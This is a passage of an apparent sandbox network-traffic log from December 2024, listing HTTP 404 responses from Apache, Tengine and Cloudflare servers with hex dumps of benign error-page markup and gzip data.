href="./style.css"></head><body><!-- partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a><!-- partial --> </body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 03 Dec 2024 08:48:32 GMTServer: ApacheContent-Length: 493Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 43 6f 64 65 50 65 6e 20 2d 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 2f 65 59 64 6d 64 58 77 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 75 6d 62 65 72 22 3e 34 30 34 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 78 74 22 3e 3c 73 70 61 6e 3e 4f 6f 6f 70 73 2e 2e 2e 3c 2f 73 70 61 6e 3e 3c 62 72 3e 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 64 69 76 3e 0a 3c 61 20 63 6c 61 73 73 3d 22 6d 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 73 2f 70 6f 70 75 6c 61 72 2f 3f 67 72 69 64 5f 74 79 70 65 3d 6c 69 73 74 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 3c 2f 61 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 20 2d 2d 3e 0a 20 20 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body><!-- partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a><!-- partial --> </body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: TengineDate: Tue, 03 Dec 2024 08:48:51 GMTContent-Type: text/html; charset=utf-8Content-Length: 58288Connection: closeVary: Accept-EncodingETag: "67344967-e3b0"Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 74 79 6c 65 3e 0a 09 09 09 2a 20 7b 0a 09 09 09 09 6d 61 72 67 69 6e 3a 20 30 3b 0a 09 09 09 09 70 61 64 64 69 6e 67 3a 20 30 3b 0a 09 09 09 09 62 6f 78 2d 73 69 7a 69 6e 67 3a 20 62 6f 72 64 65 72 2d 62 6f 78 3b 0a 09 09 09 7d 0a 09 09 09 68 74 6d 6c 20 7b 0a 09 09 09 09 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 09 09 09 7d 0a 09 09 09 62 6f 64 79 20 7b 0a 09 09 09 09 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 09 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0a 09 09 09 7d 0a 09 09 09 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 09 09 09 09 64 69 73 70 6c 61 79 3a 20 66 6c 65 78 3b 0a 09 09 09 09 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 20 63 6f 6c 75 6d 6e 3b 0a 09 09 09 09 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 20 63 65 6e 74 65 72 3b 0a 09 09 09 09 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 09 09 09 09 70 61 64 64 69 6e 67 2d 74 6f 70 3a 20 31 32 25 3b 0a 09 09 09 7d 0a 09 09 09 2e 6c 6f 67 6f 20 69 6d 67 20 7b 0a 09 09 09 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 09 09 09 20 20 20 20 77 69 64 74 68 3a 20 31 30 30 70 78 3b 0a 09 09 09 7d 0a 09 09 09 2e 6c 6f 67 6f 20 69 6d 67 20 2b 20 69 6d 67 20 7b 0a 09 09 09 20 20 20 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 31 32 70 78 3b 0a 09 09 09 7d 0a 09 09 09 2e 74 69 74 6c 65 20 7b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 32 34 70 78 3b 0a 09 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 31 30 70 78 3b 0a 09 09 09 09 63 6f 6c 6f 72 3a 20 23 33 33 33 3b 0a 09 09 09 09 6c 65 74 74 65 72 2d 73 70 61 63 69 6e 67 3a 20 31 30 70 78 3b 0a 09 09 09 7d 0a 09 09 09 2e 64 65 73 63 20 7b 0a 09 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 36 70 78 3b 0a 09 09 09 09 63 6f 6c 6f 72 3a 20 23 37 37 37 3b 0a 09 09 09 09 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 09 09 09 09 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 34 70 78 3b 0a 09 09 09 7d 0a 09 09 09 2e 66 6f 6f 74 65 72 20 7b 0a 09 09 09 09 2f 2a 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 09 09 09 09 6c 65 66 74 3a 20 30 3b 0a 09 09 09 09 62 6f 74 74 6f 6d 3a 20 33 32 70 78 3b 0a 09 09 09 09 77 69 64 74 68 3a 20 31 30 30 25 3b 20 2a 2f 0a 09 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 32 34 70 78 3b 0a 09 09 09 09 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 09 09 09 09 66 6f
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: TengineDate: Tue, 03 Dec 2024 08:48:54 GMTContent-Type: text/html; charset=utf-8Content-Length: 58288Connection: closeVary: Accept-EncodingETag: "67344967-e3b0"Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 74 79 6c 65 3e 0a 09 09 09 2a 20 7b 0a 09 09 09 09 6d 61 72 67 69 6e 3a 20 30 3b 0a 09 09 09 09 70 61 64 64 69 6e 67 3a 20 30 3b 0a 09 09 09 09 62 6f 78 2d 73 69 7a 69 6e 67 3a 20 62 6f 72 64 65 72 2d 62 6f 78 3b 0a 09 09 09 7d 0a 09 09 09 68 74 6d 6c 20 7b 0a 09 09 09 09 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 09 09 09 7d 0a 09 09 09 62 6f 64 79 20 7b 0a 09 09 09 09 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 09 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0a 09 09 09 7d 0a 09 09 09 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 09 09 09 09 64 69 73 70 6c 61 79 3a 20 66 6c 65 78 3b 0a 09 09 09 09 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 20 63 6f 6c 75 6d 6e 3b 0a 09 09 09 09 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 20 63 65 6e 74 65 72 3b 0a 09 09 09 09 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 09 09 09 09 70 61 64 64 69 6e 67 2d 74 6f 70 3a 20 31 32 25 3b 0a 09 09 09 7d 0a 09 09 09 2e 6c 6f 67 6f 20 69 6d 67 20 7b 0a 09 09 09 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 09 09 09 20 20 20 20 77 69 64 74 68 3a 20 31 30 30 70 78 3b 0a 09 09 09 7d 0a 09 09 09 2e 6c 6f 67 6f 20 69 6d 67 20 2b 20 69 6d 67 20 7b 0a 09 09 09 20 20 20 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 31 32 70 78 3b 0a 09 09 09 7d 0a 09 09 09 2e 74 69 74 6c 65 20 7b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 32 34 70 78 3b 0a 09 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 31 30 70 78 3b 0a 09 09 09 09 63 6f 6c 6f 72 3a 20 23 33 33 33 3b 0a 09 09 09 09 6c 65 74 74 65 72 2d 73 70 61 63 69 6e 67 3a 20 31 30 70 78 3b 0a 09 09 09 7d 0a 09 09 09 2e 64 65 73 63 20 7b 0a 09 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 36 70 78 3b 0a 09 09 09 09 63 6f 6c 6f 72 3a 20 23 37 37 37 3b 0a 09 09 09 09 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 09 09 09 09 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 34 70 78 3b 0a 09 09 09 7d 0a 09 09 09 2e 66 6f 6f 74 65 72 20 7b 0a 09 09 09 09 2f 2a 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 09 09 09 09 6c 65 66 74 3a 20 30 3b 0a 09 09 09 09 62 6f 74 74 6f 6d 3a 20 33 32 70 78 3b 0a 09 09 09 09 77 69 64 74 68 3a 20 31 30 30 25 3b 20 2a 2f 0a 09 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 32 34 70 78 3b 0a 09 09 09 09 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 09 09 09 09 66 6f
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: TengineDate: Tue, 03 Dec 2024 08:48:56 GMTContent-Type: text/html; charset=utf-8Content-Length: 58288Connection: closeVary: Accept-EncodingETag: "67344967-e3b0"Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 74 79 6c 65 3e 0a 09 09 09 2a 20 7b 0a 09 09 09 09 6d 61 72 67 69 6e 3a 20 30 3b 0a 09 09 09 09 70 61 64 64 69 6e 67 3a 20 30 3b 0a 09 09 09 09 62 6f 78 2d 73 69 7a 69 6e 67 3a 20 62 6f 72 64 65 72 2d 62 6f 78 3b 0a 09 09 09 7d 0a 09 09 09 68 74 6d 6c 20 7b 0a 09 09 09 09 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 09 09 09 7d 0a 09 09 09 62 6f 64 79 20 7b 0a 09 09 09 09 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 09 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0a 09 09 09 7d 0a 09 09 09 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 09 09 09 09 64 69 73 70 6c 61 79 3a 20 66 6c 65 78 3b 0a 09 09 09 09 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 20 63 6f 6c 75 6d 6e 3b 0a 09 09 09 09 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 20 63 65 6e 74 65 72 3b 0a 09 09 09 09 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 09 09 09 09 70 61 64 64 69 6e 67 2d 74 6f 70 3a 20 31 32 25 3b 0a 09 09 09 7d 0a 09 09 09 2e 6c 6f 67 6f 20 69 6d 67 20 7b 0a 09 09 09 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 09 09 09 20 20 20 20 77 69 64 74 68 3a 20 31 30 30 70 78 3b 0a 09 09 09 7d 0a 09 09 09 2e 6c 6f 67 6f 20 69 6d 67 20 2b 20 69 6d 67 20 7b 0a 09 09 09 20 20 20 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 31 32 70 78 3b 0a 09 09 09 7d 0a 09 09 09 2e 74 69 74 6c 65 20 7b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 32 34 70 78 3b 0a 09 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 31 30 70 78 3b 0a 09 09 09 09 63 6f 6c 6f 72 3a 20 23 33 33 33 3b 0a 09 09 09 09 6c 65 74 74 65 72 2d 73 70 61 63 69 6e 67 3a 20 31 30 70 78 3b 0a 09 09 09 7d 0a 09 09 09 2e 64 65 73 63 20 7b 0a 09 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 36 70 78 3b 0a 09 09 09 09 63 6f 6c 6f 72 3a 20 23 37 37 37 3b 0a 09 09 09 09 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 09 09 09 09 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 34 70 78 3b 0a 09 09 09 7d 0a 09 09 09 2e 66 6f 6f 74 65 72 20 7b 0a 09 09 09 09 2f 2a 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 09 09 09 09 6c 65 66 74 3a 20 30 3b 0a 09 09 09 09 62 6f 74 74 6f 6d 3a 20 33 32 70 78 3b 0a 09 09 09 09 77 69 64 74 68 3a 20 31 30 30 25 3b 20 2a 2f 0a 09 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 32 34 70 78 3b 0a 09 09 09 09 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 09 09 09 09 66 6f
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: TengineDate: Tue, 03 Dec 2024 08:48:59 GMTContent-Type: text/html; charset=utf-8Content-Length: 58288Connection: closeVary: Accept-EncodingETag: "67344967-e3b0"Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 74 79 6c 65 3e 0a 09 09 09 2a 20 7b 0a 09 09 09 09 6d 61 72 67 69 6e 3a 20 30 3b 0a 09 09 09 09 70 61 64 64 69 6e 67 3a 20 30 3b 0a 09 09 09 09 62 6f 78 2d 73 69 7a 69 6e 67 3a 20 62 6f 72 64 65 72 2d 62 6f 78 3b 0a 09 09 09 7d 0a 09 09 09 68 74 6d 6c 20 7b 0a 09 09 09 09 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 09 09 09 7d 0a 09 09 09 62 6f 64 79 20 7b 0a 09 09 09 09 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 09 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0a 09 09 09 7d 0a 09 09 09 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 09 09 09 09 64 69 73 70 6c 61 79 3a 20 66 6c 65 78 3b 0a 09 09 09 09 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 20 63 6f 6c 75 6d 6e 3b 0a 09 09 09 09 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 20 63 65 6e 74 65 72 3b 0a 09 09 09 09 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 09 09 09 09 70 61 64 64 69 6e 67 2d 74 6f 70 3a 20 31 32 25 3b 0a 09 09 09 7d 0a 09 09 09 2e 6c 6f 67 6f 20 69 6d 67 20 7b 0a 09 09 09 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 09 09 09 20 20 20 20 77 69 64 74 68 3a 20 31 30 30 70 78 3b 0a 09 09 09 7d 0a 09 09 09 2e 6c 6f 67 6f 20 69 6d 67 20 2b 20 69 6d 67 20 7b 0a 09 09 09 20 20 20 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 31 32 70 78 3b 0a 09 09 09 7d 0a 09 09 09 2e 74 69 74 6c 65 20 7b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 32 34 70 78 3b 0a 09 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 31 30 70 78 3b 0a 09 09 09 09 63 6f 6c 6f 72 3a 20 23 33 33 33 3b 0a 09 09 09 09 6c 65 74 74 65 72 2d 73 70 61 63 69 6e 67 3a 20 31 30 70 78 3b 0a 09 09 09 7d 0a 09 09 09 2e 64 65 73 63 20 7b 0a 09 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 36 70 78 3b 0a 09 09 09 09 63 6f 6c 6f 72 3a 20 23 37 37 37 3b 0a 09 09 09 09 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 09 09 09 09 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 34 70 78 3b 0a 09 09 09 7d 0a 09 09 09 2e 66 6f 6f 74 65 72 20 7b 0a 09 09 09 09 2f 2a 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 09 09 09 09 6c 65 66 74 3a 20 30 3b 0a 09 09 09 09 62 6f 74 74 6f 6d 3a 20 33 32 70 78 3b 0a 09 09 09 09 77 69 64 74 68 3a 20 31 30 30 25 3b 20 2a 2f 0a 09 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 32 34 70 78 3b 0a 09 09 09 09 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 09 09 09 09 66 6f
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 03 Dec 2024 08:49:06 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeVary: Accept-EncodingCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Hd8oVd7SQEoQiBowtksh3V7C8H3Isu1c6uMW5nhTTE37pWxPwirJGrlVGCmbVOhGgFL5oeIWmzdYbQ3iH3CJTgMgvAkP9TUtthBBxuIH6xGV8tPm9m0L1zVPh0aMZYPafJA%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8ec24d2c386d729e-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=103036&min_rtt=103036&rtt_var=51518&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=669&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 31 65 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 7c 53 cb b2 9b 30 0c 5d 73 bf 42 a5 73 37 69 09 90 a4 4d 87 40 96 5d f6 1f 8c 2d c0 73 8d c5 60 25 37 69 a7 ff de e1 19 e8 34 dd 60 24 59 c7 47 47 52 fa 41 91 e4 7b 83 50 71 6d ce 2f e9 70 78 69 85 42 9d 5f 3c 2f ad 91 05 c8 4a b4 0e 39 f3 2f 5c 04 df 7c 08 1f 21 2b 6a cc fc ab c6 f7 86 5a f6 41 92 65 b4 9c f9 ef 5a 71 95 29 bc 6a 89 41 6f 7c 06 6d 35 6b 61 02 27 85 c1 2c de 46 13 14 6b 36 78 3e 44 07 f8 41 0c df e9 62 55 1a 0e ce 2e ec f8 3e fc 79 1b f8 d5 1d 5e 2d da 52 db 04 a2 53 6f 36 42 29 6d cb d9 ce e9 16 38 fd b3 77 e5 d4 2a 6c 83 9c 6e 7d ec 77 f7 e9 ca 1c 91 2a d4 65 c5 09 c4 51 f4 fa b8 90 93 ba 3f bb e0 15 64 b9 83 c7 04 e2 43 b3 80 dd 76 d5 0b 6d b1 1d 73 95 76 8d 11 f7 04 0a 83 b7 31 d9 e0 2d 50 ba 45 c9 9a 6c 02 92 cc a5 b6 43 4c 18 5d da 40 33 d6 2e 01 89 96 b1 3d 3d e1 30 56 1c 30 35 09 c4 bb 05 f5 ad a1 92 40 d7 e5 c0 01 00 60 a6 91 1b 92 6f a7 c9 dd 77 a5 07 5d 15 31 e7 7f 5a a3 0c 9a 4f 2f ae 52 fa 56 ad 5a 33 5c db 4d f2 ac 34 8b a7 f7 3c 49 86 da 04 3e ee f7 fb c1 61 90 19 db c0 35 42 f6 cd 8b d7 d4 14 3a 39 3e b3 04 fc fa 37 de f1 78 1c 1c 8c 37 0e 7a 59 d7 82 1a 6d 31 98 54 dd ad 9b 58 10 f1 dc c1 70 03 0d 39 3d f4 4a e4 8e cc 85 71 e2 5a f0 62 e2 98 a9 4e 60 3f 09 e3 3d d4 7d 3d c1 26 fc 8f 36 cf 48 2e 4b dc fd 8b e2 36 67 a3 ed db 48 75 2a 7e 17 89 2f 7b b1 80 56 28 a9 15 43 09 96 2c ce 40 69 38 6d 56 1a 8e 1b 9f 76 93 df 2f 9d Data Ascii: 1ed|S0]sBs7iM@]-s`%7i4`$YGGRA{Pqm/pxiB_</J9/\|!+jZAeZq)jAo|m5ka',Fk6x>DAbU.>y^-RSo6B)m8w*ln}w*eQ?dCvmsv1-PElCL]@3.==0V05@`ow]1ZO/RVZ3\M4<I>a5B:9>7x7zYm1TXp9=JqZbN`?=}=&6H.K6gHu*~/{V(C,@i8mVv/
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 03 Dec 2024 08:49:09 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeVary: Accept-EncodingCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wYjIlXQ1wx%2BXFIFU5E%2FuMUz7xArac29dYoP%2FRK3haec%2BPQLkaZOrP26Audjc8g9JUqxyAZC6iETP%2Fnfh%2B%2FqakeezBipfPBEhFEIwXuM22pfbEG2ND6D8H42N8gVNgk5sxok%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8ec24d3cba4341a1-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=102747&min_rtt=102747&rtt_var=51373&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=689&delivery_rate=0&cwnd=245&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 31 65 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 7c 53 cb b2 9b 30 0c 5d 73 bf 42 a5 73 37 69 09 90 a4 4d 87 40 96 5d f6 1f 8c 2d c0 73 8d c5 60 25 37 69 a7 ff de e1 19 e8 34 dd 60 24 59 c7 47 47 52 fa 41 91 e4 7b 83 50 71 6d ce 2f e9 70 78 69 85 42 9d 5f 3c 2f ad 91 05 c8 4a b4 0e 39 f3 2f 5c 04 df 7c 08 1f 21 2b 6a cc fc ab c6 f7 86 5a f6 41 92 65 b4 9c f9 ef 5a 71 95 29 bc 6a 89 41 6f 7c 06 6d 35 6b 61 02 27 85 c1 2c de 46 13 14 6b 36 78 3e 44 07 f8 41 0c df e9 62 55 1a 0e ce 2e ec f8 3e fc 79 1b f8 d5 1d 5e 2d da 52 db 04 a2 53 6f 36 42 29 6d cb d9 ce e9 16 38 fd b3 77 e5 d4 2a 6c 83 9c 6e 7d ec 77 f7 e9 ca 1c 91 2a d4 65 c5 09 c4 51 f4 fa b8 90 93 ba 3f bb e0 15 64 b9 83 c7 04 e2 43 b3 80 dd 76 d5 0b 6d b1 1d 73 95 76 8d 11 f7 04 0a 83 b7 31 d9 e0 2d 50 ba 45 c9 9a 6c 02 92 cc a5 b6 43 4c 18 5d da 40 33 d6 2e 01 89 96 b1 3d 3d e1 30 56 1c 30 35 09 c4 bb 05 f5 ad a1 92 40 d7 e5 c0 01 00 60 a6 91 1b 92 6f a7 c9 dd 77 a5 07 5d 15 31 e7 7f 5a a3 0c 9a 4f 2f ae 52 fa 56 ad 5a 33 5c db 4d f2 ac 34 8b a7 f7 3c 49 86 da 04 3e ee f7 fb c1 61 90 19 db c0 35 42 f6 cd 8b d7 d4 14 3a 39 3e b3 04 fc fa 37 de f1 78 1c 1c 8c 37 0e 7a 59 d7 82 1a 6d 31 98 54 dd ad 9b 58 10 f1 dc c1 70 03 0d 39 3d f4 4a e4 8e cc 85 71 e2 5a f0 62 e2 98 a9 4e 60 3f 09 e3 3d d4 7d 3d c1 26 fc 8f 36 cf 48 2e 4b dc fd 8b e2 36 67 a3 ed db 48 75 2a 7e 17 89 2f 7b b1 80 56 28 a9 15 43 09 96 2c ce Data Ascii: 1ed|S0]sBs7iM@]-s`%7i4`$YGGRA{Pqm/pxiB_</J9/\|!+jZAeZq)jAo|m5ka',Fk6x>DAbU.>y^-RSo6B)m8w*ln}w*eQ?dCvmsv1-PElCL]@3.==0V05@`ow]1ZO/RVZ3\M4<I>a5B:9>7x7zYm1TXp9=JqZbN`?=}=&6H.K6gHu*~/{V(C,
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 03 Dec 2024 08:49:11 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeVary: Accept-EncodingCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Nt83D2s5bzZT2Nkit2lY%2BpZvmBc9A7xeuMZJiDuuCVbVyjPq9Zpyk3upNFWxcFz%2BmZ6JndyUGaVn8nCAZjzobwd86c5b6qgiDLgQGzkTOmkOLU%2B8lWblTzPyqVlwWnfzv6U%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8ec24d4d3ad44327-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: 